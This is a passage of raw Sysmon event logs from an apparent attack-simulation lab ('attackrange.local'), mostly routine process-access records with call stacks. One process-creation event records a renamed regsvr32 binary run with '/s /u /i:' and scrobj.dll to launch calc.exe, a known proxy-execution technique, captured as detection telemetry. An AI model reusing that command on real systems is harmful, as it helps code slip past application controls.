Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032958Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.163{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3706-6013-7E03-00000000A401}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032957Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032956Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032955Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032954Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032953Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.163{FF16AF91-26B4-6013-0500-00000000A401}644760C:\Windows\system32\csrss.exe{FF16AF91-3706-6013-7E03-00000000A401}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032952Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.163{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3706-6013-7E03-00000000A401}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032951Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:26.163{FF16AF91-3706-6013-7E03-00000000A401}2320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000361296Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:26.147{8e433fbf-337b-6013-8902-000000001100}624410336C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+1ed62|c:\windows\system32\cbdhsvc.dll+1e9c6|c:\windows\system32\cbdhsvc.dll+1e61e|c:\windows\system32\cbdhsvc.dll+1e289|c:\windows\system32\cbdhsvc.dll+1ef72|c:\windows\system32\cbdhsvc.dll+4063a|c:\windows\system32\cbdhsvc.dll+3e3f7|c:\windows\system32\cbdhsvc.dll+3d956|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361295Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:26.147{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8902-000000001100}6244C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+32810|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361294Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:26.147{8e433fbf-337b-6013-8902-000000001100}62445776C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+21ee8|C:\Windows\System32\appresolver.dll+1ef46|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361293Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:26.147{8e433fbf-337b-6013-8902-000000001100}62445776C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+1ee93|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361292Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:26.147{8e433fbf-337b-6013-8902-000000001100}62445776C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+221c5|C:\Windows\System32\appresolver.dll+1edcc|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361291Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:26.147{8e433fbf-337b-6013-8902-000000001100}62445776C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+1fb9d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361290Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:26.147{8e433fbf-337b-6013-8902-000000001100}624410336C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+b4a80|c:\windows\system32\cbdhsvc.dll+1e838|c:\windows\system32\cbdhsvc.dll+1e17e|c:\windows\system32\cbdhsvc.dll+1ef72|c:\windows\system32\cbdhsvc.dll+4063a|c:\windows\system32\cbdhsvc.dll+3e3f7|c:\windows\system32\cbdhsvc.dll+3d956|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361356Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.975{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361355Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.975{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 13241300x8000000000000000361354Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:13:27.975{8e433fbf-3707-6013-b103-000000001100}4716C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 10341000x8000000000000000361353Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.960{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361352Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.960{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361351Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.960{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361350Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.960{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361349Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.960{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361348Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.960{8e433fbf-3707-6013-b203-000000001100}85809824C:\Temp\notregsvr32.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\System32\windows.storage.dll+14c4a6|C:\Windows\System32\windows.storage.dll+14ccc3|C:\Windows\System32\windows.storage.dll+14c2e8|C:\Windows\System32\windows.storage.dll+14c113|C:\Windows\System32\windows.storage.dll+14be0d|C:\Windows\System32\windows.storage.dll+13d1d8|C:\Windows\System32\windows.storage.dll+14d6dd|C:\Windows\System32\windows.storage.dll+15bf79|C:\Windows\System32\SHELL32.dll+3ec1e|C:\Windows\System32\SHELL32.dll+41755|C:\Windows\System32\SHELL32.dll+c014e|C:\Windows\System32\shcore.dll+2dce5|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000361347Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.967{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe10.0.18362.1 (WinBuild.160101.0800)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=F88CC05134C555D4E1CD1DEF78162A9A,SHA256=A103A57D50B32469C5811E2808F021ADF9D9220093B540B8A9C83B5C821D370E,IMPHASH=8EEAA9499666119D13B3F44ECD77A729{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exeC:\Temp\notregsvr32.exe /s /u /i:c:\Temp\RegSvr32.txt scrobj.dll 10341000x8000000000000000361346Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.944{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361345Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.944{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361344Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.944{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+2e3b5|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361343Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.897{8e433fbf-2a44-6013-1100-000000001100}11165232C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b203-000000001100}8580C:\Temp\notregsvr32.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361342Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 